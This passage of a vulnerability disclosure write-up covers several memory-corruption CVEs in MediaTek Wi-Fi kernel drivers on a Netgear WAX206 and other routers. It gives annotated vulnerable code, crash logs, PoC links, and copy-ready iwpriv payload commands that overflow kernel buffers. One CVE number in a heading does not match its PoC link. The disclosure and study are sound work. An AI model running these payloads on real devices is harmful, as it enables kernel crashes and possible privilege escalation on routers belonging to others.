			<span class="n">res</span> <span class="o">=</span> <span class="n">copy_from_user</span><span class="p">(</span><span class="n">wsc_ctrl</span><span class="o">-&gt;</span><span class="n">psk</span><span class="p">,</span> <span class="n">wrq</span><span class="o">-&gt;</span><span class="n">u</span><span class="p">.</span><span class="n">data</span><span class="p">.</span><span class="n">pointer</span><span class="p">,</span> <span class="n">wrq</span><span class="o">-&gt;</span><span class="n">u</span><span class="p">.</span><span class="n">data</span><span class="p">.</span><span class="n">length</span><span class="p">);</span>
			<span class="p">...</span>
		<span class="p">}</span>
	<span class="p">}</span>
</code></pre></div></div>

<h4 id="poc">PoC</h4>

<p><strong>PoC Source</strong>: <a href="https://github.com/mellow-hype/mediarekt-2025/blob/main/cve-2025-20631.c">PoC Link</a></p>

<p>Execute the PoC on a vulnerable system to corrupt kernel memory.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@WAX206:/tmp# ./poc-ioctl
[  312.422633] Unable to handle kernel paging request at virtual address 41414141414145
[  312.430424] pgd = ffffffc016fb6000
[  312.433854] [41414141414145] *pgd=0000000000000000[  312.434057] [PMF]APPMFInit:: Security is not WPA2/WPA2PSK AES
[  312.434060] [PMF]APPMFInit:: apidx=0, MFPC=0, MFPR=0, SHA256=0
[  312.434126] wifi_sys_linkdown(), wdev idx = 0
...
</code></pre></div></div>

<h3 id="cve-2025-70632-heap-overflow-in-r0khid-ioctl-handler">CVE-2025-70632: Heap Overflow in R0KHID Ioctl Handler</h3>

<ul>
  <li><strong>Affected Versions</strong>: MT7622 v5.0.5.4, v5.1.0.0; MT7629 driver v6.0.3.0</li>
  <li><strong>Affected Devices</strong>: Netgear WAX206 (confirmed), Starlink Wifi Gen2</li>
</ul>

<p>The handler code responsible for handling the <code class="language-plaintext highlighter-rouge">RT_OID_802_11R_R0KHID</code> OID is found in the function <code class="language-plaintext highlighter-rouge">RTMPAPSetInformation()</code>. The root cause of the vulnerability is improper bounds checking of the attacker-controlled <code class="language-plaintext highlighter-rouge">iwreq.u.data.length</code> value passed from userspace; rather than checking that the value does not exceed the size of the destination <code class="language-plaintext highlighter-rouge">FtR0khId</code> field and exiting early if it does, the code does the <em>opposite</em> and checks that the incoming size if not <em>less than or equal to</em> the destination field size, essentially forcing an overflow condition to occur. The overflow happens on the call to <code class="language-plaintext highlighter-rouge">copy_from_user()</code> and writes to <code class="language-plaintext highlighter-rouge">wdev.FtCfg.FtR0khId[48]</code>. This is likely the result of a typo (using <code class="language-plaintext highlighter-rouge">&lt;=</code> when <code class="language-plaintext highlighter-rouge">&gt;=</code> was intended).</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">...</span>
<span class="k">if</span> <span class="p">(</span><span class="n">wrq</span><span class="o">-&gt;</span><span class="n">u</span><span class="p">.</span><span class="n">data</span><span class="p">.</span><span class="n">length</span> <span class="o">&lt;=</span> <span class="n">FT_ROKH_ID_LEN</span><span class="p">)</span>
	<span class="c1">// error case</span>
<span class="k">else</span> <span class="p">{</span>
	<span class="n">status</span> <span class="o">=</span> <span class="n">copy_from_user</span><span class="p">(</span><span class="n">obj</span><span class="o">-&gt;</span><span class="n">ap</span><span class="p">.</span><span class="n">bssid</span><span class="p">[</span><span class="n">apidx</span><span class="p">].</span><span class="n">wdev</span><span class="p">.</span><span class="n">cfg</span><span class="p">.</span><span class="n">r0khid</span><span class="p">,</span> <span class="n">wrq</span><span class="o">-&gt;</span><span class="n">u</span><span class="p">.</span><span class="n">data</span><span class="p">.</span><span class="n">pointer</span><span class="p">,</span> <span class="n">wrq</span><span class="o">-&gt;</span><span class="n">u</span><span class="p">.</span><span class="n">data</span><span class="p">.</span><span class="n">length</span><span class="p">);</span>
	<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>

<h4 id="poc-1">PoC</h4>

<p><strong>PoC Source</strong>: <a href="https://github.com/mellow-hype/mediarekt-2025/blob/main/cve-2025-20632.c">PoC Link</a></p>

<p>The included PoC demonstrates the ability to corrupt the instruction pointer with an arbitrary address by chaining this bug with an info leak in the <code class="language-plaintext highlighter-rouge">iwpriv mac</code> subcommand handler.</p>

<p><img src="/assets/images/cve-2025-20632-poc.png" alt="cve-2025-20632" /></p>

<h3 id="cve-2025-20713-stack-overflow-in-set_beaconreq_proc-parsing-of-channel-report-list">CVE-2025-20713: Stack Overflow in Set_BeaconReq_Proc Parsing of channel report list</h3>

<ul>
  <li><strong>Affected Versions</strong>: MT7622 v5.0.5.4</li>
  <li><strong>Affected Devices</strong>: Netgear WAX206 (confirmed)</li>
</ul>

<p>The function <code class="language-plaintext highlighter-rouge">Set_BeaconReq_Proc()</code> in the <code class="language-plaintext highlighter-rouge">mt7622_mt_wifi</code> driver is vulnerable to a stack buffer overflow when handling the data passed in via the call to <code class="language-plaintext highlighter-rouge">ioctl()</code> which triggers the handler. Specifically, the issue is found in the code block that handles parsing of the “channel report list” command parameter field in the incoming command string. The issue occurs due to an unbounded <code class="language-plaintext highlighter-rouge">while</code> loop which uses a counter to index and write into a stack allocated buffer based on presence of the separate character <code class="language-plaintext highlighter-rouge">#</code> in the argument field. The values written to this buffer are 1-byte numeric values parsed using <code class="language-plaintext highlighter-rouge">strtol()</code> from the attacker-controlled input.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">case</span> <span class="mi">8</span><span class="p">:</span>
	<span class="p">...</span>
	<span class="c1">// @hypr: VULNERABLE</span>
	<span class="k">while</span> <span class="p">((</span><span class="n">chan_id_str</span> <span class="o">=</span> <span class="n">strsep</span><span class="p">((</span><span class="kt">char</span> <span class="o">**</span><span class="p">)</span><span class="o">&amp;</span><span class="n">input_str</span><span class="p">,</span> <span class="s">"#"</span><span class="p">))</span> <span class="o">!=</span> <span class="nb">NULL</span><span class="p">)</span> <span class="p">{</span>
		<span class="n">chan_rep_list</span><span class="p">[</span><span class="n">chan_id</span><span class="p">]</span> <span class="o">=</span> <span class="n">strtol</span><span class="p">(</span><span class="n">chan_id_str</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">10</span><span class="p">);</span>
		<span class="n">chan_id</span><span class="o">++</span><span class="p">;</span>
	<span class="p">}</span>
<span class="p">...</span>
</code></pre></div></div>

<h4 id="poc-2">PoC</h4>
<p>On a system where the kernel driver is installed, run the following <code class="language-plaintext highlighter-rouge">iwpriv</code> command to issue the IOCTL for the vulnerable code path via the <code class="language-plaintext highlighter-rouge">set</code> subcommand for <code class="language-plaintext highlighter-rouge">BcnReq</code> key value.</p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># write in 65 (0x41), so we end up with 0x414141414141</span>
<span class="nb">export </span><span class="nv">PAYLOAD</span><span class="o">=</span><span class="si">$(</span>python3 <span class="nt">-c</span> <span class="s2">"print('#65'*400)"</span><span class="si">)</span>
iwpriv ra0 <span class="nb">set</span> <span class="s2">"BcnReq=1!50!12!FF:FF:FF:FF:FF:FF!HYPR!255!1!32+1!1#5!1!1</span><span class="nv">$PAYLOAD</span><span class="s2">"</span>
</code></pre></div></div>

<h3 id="cve-2025-20714-stack-overflow-in-set_beaconreq_proc-parsing-of-regulatory-class-parameter">CVE-2025-20714: Stack Overflow in Set_BeaconReq_Proc Parsing of regulatory class parameter</h3>

<p><em>MediaTek assigned a CVE for this bug, but still claimed the bug was a duplicate because the overflow happens in the same function as the other two issues in this function (CVE-2025-20715, CVE-2025-20713). That’s it – that’s the only reason they used to argue it was a duplicate.</em></p>

<ul>
  <li><strong>Affected Versions</strong>: MT7622 v5.0.5.4</li>
  <li><strong>Affected Devices</strong>: Netgear WAX206 (confirmed)</li>
</ul>

<p>The function <code class="language-plaintext highlighter-rouge">Set_BeaconReq_Proc()</code> in the <code class="language-plaintext highlighter-rouge">mt7622_mt_wifi</code> driver is vulnerable to a stack buffer overflow when handling the data passed in via the call to <code class="language-plaintext highlighter-rouge">ioctl()</code> which triggers the handler. Specifically, the issue is found in the code block that handles parsing of the “regulatory class” command parameter field in the incoming command string (parameter index 7). The issue occurs due to an unbounded <code class="language-plaintext highlighter-rouge">while</code> loop which uses a counter to index and write into a buffer at <code class="language-plaintext highlighter-rouge">RRM_MLME_BCN_REQ_INFO req_struct.reg_class[16]</code> (stack allocated) based on presence of the separate character <code class="language-plaintext highlighter-rouge">+</code> in the argument field. The values written to this buffer are 1-byte numeric values parsed using <code class="language-plaintext highlighter-rouge">os_str_tol()</code> from the attacker-controlled input.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">case</span> <span class="mi">7</span><span class="p">:</span> <span class="p">{</span> <span class="cm">/* regulatory class. */</span>
	<span class="k">while</span> <span class="p">((</span><span class="n">reg_str</span> <span class="o">=</span> <span class="n">strsep</span><span class="p">((</span><span class="kt">char</span> <span class="o">**</span><span class="p">)</span><span class="o">&amp;</span><span class="n">thisChar</span><span class="p">,</span> <span class="s">"+"</span><span class="p">))</span> <span class="o">!=</span> <span class="nb">NULL</span><span class="p">)</span> <span class="p">{</span>
		<span class="n">req_struct</span><span class="p">.</span><span class="n">reg_class</span><span class="p">[</span><span class="n">reg_class_index</span><span class="p">]</span> <span class="o">=</span> <span class="n">strtol</span><span class="p">(</span><span class="n">reg_str</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">10</span><span class="p">);</span>
		<span class="n">reg_class_index</span><span class="o">++</span><span class="p">;</span>
	<span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<h4 id="poc-3">PoC</h4>
<p>On a system where the kernel driver is installed, run the following commands to create the payload buffer and issue the IOCTL for the vulnerable code path via the <code class="language-plaintext highlighter-rouge">iwpriv set</code> subcommand for the <code class="language-plaintext highlighter-rouge">BcnReq</code> key value.</p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># write in 65 (0x41), so we end up with 0x414141414141</span>
<span class="nb">export </span><span class="nv">PAYLOAD</span><span class="o">=</span><span class="si">$(</span>python3 <span class="nt">-c</span> <span class="s2">"print('+65'*400)"</span><span class="si">)</span>
iwpriv ra0 <span class="nb">set</span> <span class="s2">"BcnReq=1!50!12!FF:FF:FF:FF:FF:FF!HYPR!255!1!32</span><span class="nv">$PAYLOAD</span><span class="s2">"</span>
</code></pre></div></div>

<h3 id="cve-2025-20715-stack-overflow-in-set_beaconreq_proc-parsing-of-request-ie-parameter">CVE-2025-20715: Stack Overflow in Set_BeaconReq_Proc Parsing of request IE parameter</h3>

<ul>
  <li><strong>Affected Versions</strong>: MT7622 v5.0.5.4</li>
  <li><strong>Affected Devices</strong>: Netgear WAX206 (confirmed), others not confirmed</li>
</ul>

<p>The function <code class="language-plaintext highlighter-rouge">Set_BeaconReq_Proc()</code> in the <code class="language-plaintext highlighter-rouge">mt7622_mt_wifi</code> driver is vulnerable to a stack buffer overflow when handling the data passed in via the call to <code class="language-plaintext highlighter-rouge">ioctl()</code> which triggers the handler. Specifically, the issue is found in the code block that handles parsing of the “request_ie” command parameter field in the incoming command string (parameter index 10). The issue occurs due to an unbounded <code class="language-plaintext highlighter-rouge">while</code> loop which uses a counter to index and write into a buffer at <code class="language-plaintext highlighter-rouge">request_ie[13]</code> based on presence of the separate character <code class="language-plaintext highlighter-rouge">#</code> in the argument field. The values written to this buffer are 1-byte numeric values parsed using <code class="language-plaintext highlighter-rouge">strtol()</code> from the attacker-controlled input.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">case</span> <span class="mi">10</span><span class="p">:</span> <span class="p">{</span>
	<span class="c1">// @hypr: VULNERABLE</span>
	<span class="k">while</span> <span class="p">((</span><span class="n">req_str</span> <span class="o">=</span> <span class="n">strsep</span><span class="p">((</span><span class="kt">char</span> <span class="o">**</span><span class="p">)</span><span class="o">&amp;</span><span class="n">input_str</span><span class="p">,</span> <span class="s">"#"</span><span class="p">))</span> <span class="o">!=</span> <span class="nb">NULL</span><span class="p">)</span> <span class="p">{</span>
		<span class="n">request_ie</span><span class="p">[</span><span class="n">request_ie_num</span><span class="p">]</span> <span class="o">=</span> <span class="n">strtol</span><span class="p">(</span><span class="n">req_str</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">10</span><span class="p">);</span>
		<span class="n">request_ie_num</span><span class="o">++</span><span class="p">;</span>
	<span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<h4 id="poc-4">PoC</h4>
<p>On a system where the kernel driver is installed, run the following commands to create a payload buffer and run <code class="language-plaintext highlighter-rouge">iwpriv</code> to issue the IOCTL for the vulnerable code path via the <code class="language-plaintext highlighter-rouge">set</code> subcommand for <code class="language-plaintext highlighter-rouge">BcnReq</code> key value.</p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># write in 65 (0x41), so we end up with 0x414141414141</span>
<span class="nb">export </span><span class="nv">PAYLOAD</span><span class="o">=</span><span class="si">$(</span>python3 <span class="nt">-c</span> <span class="s2">"print('#65'*400)"</span><span class="si">)</span>
iwpriv ra0 <span class="nb">set</span> <span class="s2">"BcnReq=1!50!12!FF:FF:FF:FF:FF:FF!HYPR!255!1!32+1!1#5!1!1</span><span class="nv">$PAYLOAD</span><span class="s2">"</span>
</code></pre></div></div>

<h3 id="cve-2025-20717-stack-overflow-in-set_igmp_flooding_cidr_proc">CVE-2025-20717: Stack Overflow in Set_Igmp_Flooding_CIDR_Proc</h3>

<ul>
  <li><strong>Affected Versions</strong>: MT7622 v5.0.5.4</li>
  <li><strong>Affected Devices</strong>: Netgear WAX206 (confirmed)</li>
  <li><strong>Requirements</strong>: <code class="language-plaintext highlighter-rouge">IGMP_SNOOP_SUPPORT</code> flag</li>
</ul>

<p>The vulnerability occurs due to a lack of bounds checking when performing a copy operation of user-controlled data into a statically-sized buffer. This happens in the function <code class="language-plaintext highlighter-rouge">Set_Igmp_Flooding_CIDR_Proc()</code> when the contents of <code class="language-plaintext highlighter-rouge">arg</code> (which contains the argument passed as the value of <code class="language-plaintext highlighter-rouge">IgmpFloodingCIDR</code> in the <code class="language-plaintext highlighter-rouge">iwpriv</code> command) is copied to the local buffer <code class="language-plaintext highlighter-rouge">IPString[25]</code> using <code class="language-plaintext highlighter-rouge">NdisMoveMemory()</code>. The copy operation uses the length of the string in <code class="language-plaintext highlighter-rouge">arg</code> as it’s size argument without checking to ensure the string length does not exceed the size of the <code class="language-plaintext highlighter-rouge">ip_addr_str[]</code> buffer. Any argument with a length greater than 25 will result in a stack buffer overflow.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    <span class="kt">char</span> <span class="n">ip_addr_str</span><span class="p">[</span><span class="mi">25</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span><span class="sc">'\0'</span><span class="p">};</span>
    <span class="kt">char</span> <span class="o">*</span><span class="n">addr_str_ptr</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
	<span class="p">...</span>
    <span class="k">do</span> <span class="p">{</span>
		<span class="p">...</span>
        <span class="n">addr_str_ptr</span> <span class="o">=</span> <span class="n">ip_addr_str</span><span class="p">;</span>
		<span class="c1">// @hypr: VULNERABLE</span>
        <span class="n">NdisMoveMemory</span><span class="p">(</span><span class="n">addr_str_ptr</span><span class="p">,</span> <span class="n">arg</span><span class="p">,</span> <span class="n">strlen</span><span class="p">(</span><span class="n">arg</span><span class="p">));</span>
        <span class="n">addr_str_ptr</span><span class="p">[</span><span class="n">strlen</span><span class="p">(</span><span class="n">arg</span><span class="p">)]</span> <span class="o">=</span> <span class="sc">'\0'</span><span class="p">;</span>
		<span class="p">...</span>
</code></pre></div></div>

<h4 id="poc-5">PoC</h4>

<p>On a system where the kernel driver is installed, run the following commands to create a payload buffer and run <code class="language-plaintext highlighter-rouge">iwpriv</code> to issue the IOCTL for the vulnerable code path via the <code class="language-plaintext highlighter-rouge">set</code> subcommand for <code class="language-plaintext highlighter-rouge">IgmpFloodingCIDR</code> key value.</p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">export </span><span class="nv">PAYLOAD</span><span class="o">=</span><span class="si">$(</span>python3 <span class="nt">-c</span> <span class="s2">"print('A'*2000)"</span><span class="si">)</span>
iwpriv &lt;interface&gt; <span class="nb">set </span><span class="nv">IgmpFloodingCIDR</span><span class="o">=</span>0-<span class="nv">$PAYLOAD</span>
</code></pre></div></div>

<h3 id="cve-2025-20718-stack-overflow-in-rtmpapioctle2prom">CVE-2025-20718: Stack Overflow in RTMPAPIoctlE2PROM</h3>

<ul>
  <li><strong>Affected Versions</strong>: MT7622 v5.0.5.4</li>
  <li><strong>Affected Devices</strong>: Netgear WAX206 (confirmed)</li>
</ul>

<p>The function <code class="language-plaintext highlighter-rouge">RTMPAPIoctlE2PROM()</code> in the <code class="language-plaintext highlighter-rouge">mt7622_mt_wifi</code> driver is vulnerable to a stack buffer overflow when handling the data passed in via the call to <code class="language-plaintext highlighter-rouge">ioctl()</code> which triggers the handler. Specifically, the issue is found in the code that handles parsing of the value that follows the <code class="language-plaintext highlighter-rouge">=</code> character in the command string value included in the request (indicating a write operation). The issue occurs when performing a write operation (<code class="language-plaintext highlighter-rouge">NdisMoveMemory()</code>) using the length of the incoming string value as the size argument without checking whether it exceeds the size of the destination buffer. In this case, the destination buffer <code class="language-plaintext highlighter-rouge">dest[]</code> is a char buffer of 16 bytes.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>	<span class="n">value</span> <span class="o">=</span> <span class="n">strchr</span><span class="p">(</span><span class="n">this</span><span class="p">,</span> <span class="sc">'='</span><span class="p">);</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">value</span> <span class="o">!=</span> <span class="nb">NULL</span><span class="p">)</span>
		<span class="o">*</span><span class="n">value</span><span class="o">++</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
	<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">value</span> <span class="o">||</span> <span class="o">!*</span><span class="n">value</span><span class="p">)</span> <span class="p">{</span>
	<span class="p">...</span>
	<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
		<span class="c1">// @hypr: VULNERABLE (you've gotta be fucking kidding lmao)</span>
		<span class="n">NdisMoveMemory</span><span class="p">(</span><span class="o">&amp;</span><span class="n">dest</span><span class="p">,</span> <span class="n">value</span><span class="p">,</span> <span class="n">strlen</span><span class="p">(</span><span class="n">value</span><span class="p">));</span>
		<span class="n">dest</span><span class="p">[</span><span class="n">strlen</span><span class="p">(</span><span class="n">value</span><span class="p">)]</span> <span class="o">=</span> <span class="sc">'\0'</span><span class="p">;</span>
		<span class="p">...</span>
	<span class="p">}</span>
</code></pre></div></div>

<h4 id="poc-6">PoC</h4>
<p>On a system where the kernel driver is installed, run the following <code class="language-plaintext highlighter-rouge">iwpriv</code> command to issue the IOCTL for the vulnerable code path via the <code class="language-plaintext highlighter-rouge">e2p</code> subcommand.</p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>iwpriv &lt;interface&gt; e2p <span class="nv">rrr</span><span class="o">=</span>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
</code></pre></div></div>

<h3 id="cve-2025-20731-heap-overflow-in-oid_802_11_oce_reduced_neighbor_report-handler">CVE-2025-20731: Heap Overflow in OID_802_11_OCE_REDUCED_NEIGHBOR_REPORT Handler</h3>

<p><em>This bug has been incorrectively (and deceptively, imo) marked as Medium severity but it is <strong>provably</strong> not. The proof that I submitted (showing an unprivileged user exploiting the bug) was intentionally misunderstood as meaning that an attacker would have to <strong>create</strong> an unprivileged user first in order to exploit the bug, and creating users requires privileges, therefore privileges are required…?????? I corrected them multiple times but they were unable to comprehend that creating the unprivileged user wasn’t something the attacker would need to do. Go figure.</em></p>

<ul>
  <li><strong>Affected Versions</strong>: MT7622 driver v5.0.5.4, v5.1.0.0, MT7629 v6.0.3.0, MT7915 v7.4.0.0</li>
  <li><strong>Affected Devices</strong>: Netgear WAX206 (confirmed)</li>
  <li><strong>Requirements</strong>: <code class="language-plaintext highlighter-rouge">OCE_SUPPORT</code> flag</li>
</ul>

<p>The vulnerability occurs in the function <code class="language-plaintext highlighter-rouge">RTMPAPSetInformation()</code> when handling the case for OID <code class="language-plaintext highlighter-rouge">OID_802_11_OCE_REDUCED_NEIGHBOR_REPORT (0x969)</code> subcommand.</p>

<p>The issue is caused by the use of the attacker-controlled value <code class="language-plaintext highlighter-rouge">nr_list_info-&gt;ValueLen</code> in the call to <code class="language-plaintext highlighter-rouge">NdisMoveMemory()</code> without performing an upper bounds check to ensure the size of the write will not overflow the destination buffer. In this case, the destination is the <code class="language-plaintext highlighter-rouge">pMBSS-&gt;nr_list_info.Value[512]</code> buffer. <code class="language-plaintext highlighter-rouge">nr_list_info-&gt;ValueLen</code> is initialized with the data read from userspace via <code class="language-plaintext highlighter-rouge">copy_from_user()</code> and is a <code class="language-plaintext highlighter-rouge">uint32</code>, which means it’s possible to provide a length value of up to <code class="language-plaintext highlighter-rouge">MAX_UINT32</code> bytes (<code class="language-plaintext highlighter-rouge">0xffffffff</code>). This will result in corruption of  heap memory as the buffer is allocated within a larger structure allocated on the heap.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">case</span> <span class="n">OID_802_11_OCE_REDUCED_NEIGHBOR_REPORT</span><span class="p">:</span> <span class="p">{</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">is_oce_rnr</span><span class="p">(</span><span class="n">wdev</span><span class="p">))</span> <span class="p">{</span>
		<span class="p">...</span>
		<span class="n">status</span> <span class="o">=</span> <span class="n">copy_from_user</span><span class="p">(</span><span class="o">&amp;</span><span class="n">nr_list_info</span><span class="p">,</span> <span class="n">wrq</span><span class="o">-&gt;</span><span class="n">u</span><span class="p">.</span><span class="n">data</span><span class="p">.</span><span class="n">pointer</span><span class="p">,</span> <span class="n">wrq</span><span class="o">-&gt;</span><span class="n">u</span><span class="p">.</span><span class="n">data</span><span class="p">.</span><span class="n">length</span><span class="p">);</span>
		<span class="n">station_obj</span> <span class="o">=</span> <span class="o">&amp;</span><span class="n">obj</span><span class="o">-&gt;</span><span class="n">cfg</span><span class="p">.</span><span class="n">mbssid</span><span class="p">[</span><span class="n">ap_idx</span><span class="p">];</span>
		<span class="c1">// @hypr: VULNERABLE - overflow from nr_list_info.ValueLen, copied in from userspace</span>
		<span class="n">NdisMoveMemory</span><span class="p">(</span><span class="n">station_obj</span><span class="o">-&gt;</span><span class="n">nr_list_info</span><span class="p">.</span><span class="n">Value</span><span class="p">,</span>
				<span class="n">nr_list_info</span><span class="p">.</span><span class="n">Value</span><span class="p">,</span> <span class="n">nr_list_info</span><span class="p">.</span><span class="n">ValueLen</span><span class="p">);</span>
		<span class="n">station_obj</span><span class="o">-&gt;</span><span class="n">nr_list_info</span><span class="p">.</span><span class="n">ValueLen</span> <span class="o">=</span> <span class="n">nr_list_info</span><span class="p">.</span><span class="n">ValueLen</span><span class="p">;</span>
		<span class="p">...</span>
	<span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Vulnerable systems must have the <code class="language-plaintext highlighter-rouge">OceReducedNeighborReport</code> driver configuration flag set to 1.</p>

<h4 id="poc-7">PoC</h4>

<p><strong>PoC Source</strong>: <a href="https://github.com/mellow-hype/mediarekt-2025/blob/main/cve-2025-20731.c">PoC Link</a></p>

<p>Execute the PoC on the target system running a vulnerable driver to trigger a kernel crash:</p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># trigger the vulnerability</span>
./ioctl-ocernr-heap rai0 8000
</code></pre></div></div>

<h3 id="cve-2025-20732-stack-overflow-in-oid_802_11_oce_reduced_neighbor_report-handler">CVE-2025-20732: Stack Overflow in OID_802_11_OCE_REDUCED_NEIGHBOR_REPORT Handler</h3>

<p><em>This bug has been incorrectively (and deceptively, imo) marked as Medium severity but it is <strong>provably</strong> not. The proof that I submitted (showing an unprivileged user exploiting the bug) was intentionally misunderstood as meaning that an attacker would have to <strong>create</strong> an unprivileged user first in order to exploit the bug, and creating users requires privileges, therefore privileges are required…?????? I explained myself multiple times but they were “unable” to comprehend that creating the unprivileged user wasn’t something attacker would need to do.</em></p>

<ul>
  <li><strong>Affected Versions</strong>: MT7622 driver v5.0.5.4, v5.1.0.0, MT7629 v6.0.3.0, MT7915 v7.4.0.0</li>
  <li><strong>Affected Devices</strong>: Netgear WAX206 (confirmed)</li>
  <li><strong>Requirements</strong>: <code class="language-plaintext highlighter-rouge">OCE_SUPPORT</code> flag</li>
</ul>

<p>The vulnerability occurs in the function <code class="language-plaintext highlighter-rouge">RTMPAPSetInformation()</code> when handling the case for OID <code class="language-plaintext highlighter-rouge">OID_802_11_OCE_REDUCED_NEIGHBOR_REPORT (0x969)</code> subcommand. The issue is caused by the use of the attacker-controlled value <code class="language-plaintext highlighter-rouge">wrq-&gt;u.data.length</code> in the call to <code class="language-plaintext highlighter-rouge">copy_from_user()</code> without performing an upper bounds check to ensure the size of the data will not overflow the destination buffer. In this case, the destination is the <code class="language-plaintext highlighter-rouge">nr_list_info</code> structure which has a size of (512 + 4 + 4) = <em>520 bytes</em>. Therefore, size values greater than 520 bytes will result in kernel stack corruption.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    <span class="k">case</span> <span class="n">OID_802_11_OCE_REDUCED_NEIGHBOR_REPORT</span><span class="p">:</span> <span class="p">{</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">is_oce_rnr</span><span class="p">(</span><span class="n">dev</span><span class="p">))</span> <span class="p">{</span>
			<span class="p">...</span>
			<span class="c1">// @hypr: VULNERABLE - overflow nr_list_info structure</span>
            <span class="n">status</span> <span class="o">=</span> <span class="n">copy_from_user</span><span class="p">(</span><span class="o">&amp;</span><span class="n">nr_list_info</span><span class="p">,</span> <span class="n">wrq</span><span class="o">-&gt;</span><span class="n">u</span><span class="p">.</span><span class="n">data</span><span class="p">.</span><span class="n">pointer</span><span class="p">,</span> <span class="n">wrq</span><span class="o">-&gt;</span><span class="n">u</span><span class="p">.</span><span class="n">data</span><span class="p">.</span><span class="n">length</span><span class="p">);</span>
            <span class="n">station_obj</span> <span class="o">=</span> <span class="o">&amp;</span><span class="n">obj</span><span class="o">-&gt;</span><span class="n">cfg</span><span class="p">.</span><span class="n">mbssid</span><span class="p">[</span><span class="n">ap_idx</span><span class="p">];</span>
			<span class="p">...</span>
        <span class="p">}</span>
    <span class="p">}</span>
</code></pre></div></div>

<p>Vulnerable systems must have the <code class="language-plaintext highlighter-rouge">OceReducedNeighborReport</code> driver configuration flag set to 1.</p>

<h4 id="poc-8">PoC</h4>

<p><strong>PoC Source</strong>: <a href="https://github.com/mellow-hype/mediarekt-2025/blob/main/cve-2025-20732.c">PoC Link</a></p>

<p>Execute the PoC on the target system running a vulnerable driver to trigger a kernel crash:</p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># trigger the vulnerability</span>
./ioctl-ocernr-overflow rai0 2000
</code></pre></div></div>

<h3 id="cve-2025-20733-heap-overflow-in-rt_oid_wsc_set_con_wps_stop-handler">CVE-2025-20733: Heap Overflow in RT_OID_WSC_SET_CON_WPS_STOP Handler</h3>

<ul>
  <li><strong>Affected Versions</strong>: MT7622 v5.1.0.0, MT7629 v6.0.3.0, MT7981 driver v7.6.7.2</li>
  <li><strong>Affected Devices</strong>: Netgear WAX206 (confirmed), SpaceX Starlink Wifi Gen2</li>
</ul>

<p>The vulnerability occurs in the function <code class="language-plaintext highlighter-rouge">RTMPAPSetInformation()</code> when handling the OID for <code class="language-plaintext highlighter-rouge">RT_OID_WSC_SET_CON_WPS_STOP (0x764)</code>.  Within the body of the switch-case that handles this OID, an allocation is made of <code class="language-plaintext highlighter-rouge">sizeof(WSC_UPNP_CTRL_WSC_BAND_STOP)</code> and saved to the pointer <code class="language-plaintext highlighter-rouge">upnp_data_struct</code>. Assuming the allocation succeeds, a block is entered where <code class="language-plaintext highlighter-rouge">copy_from_user()</code> is called to copy data from userspace and write it to the memory allocated to <code class="language-plaintext highlighter-rouge">upnp_data_struct</code>, using <code class="language-plaintext highlighter-rouge">wrq-&gt;u.data.length</code> as the size argument for the copy operation.</p>

<p>No upper bounds check is performed on the value in <code class="language-plaintext highlighter-rouge">wrq-&gt;u.data.length</code>, which is attacker-controlled, prior to it’s use in the call to <code class="language-plaintext highlighter-rouge">copy_from_user()</code>, leading to a heap buffer overflow if an attacker provides a <code class="language-plaintext highlighter-rouge">length</code> value that is greater than <code class="language-plaintext highlighter-rouge">sizeof(WSC_UPNP_CTRL_WSC_BAND_STOP)</code> (which evaluates to 12 bytes).</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">case</span> <span class="n">RT_OID_WSC_SET_CON_WPS_STOP</span><span class="p">:</span> <span class="p">{</span>
	<span class="n">alloc_mem</span><span class="p">(</span><span class="nb">NULL</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">upnp_data_struct</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">WSC_UPNP_CTRL_WSC_BAND_STOP</span><span class="p">));</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">upnp_data_struct</span><span class="p">)</span> <span class="p">{</span>
		<span class="c1">// @hypr: VULNERABLE</span>
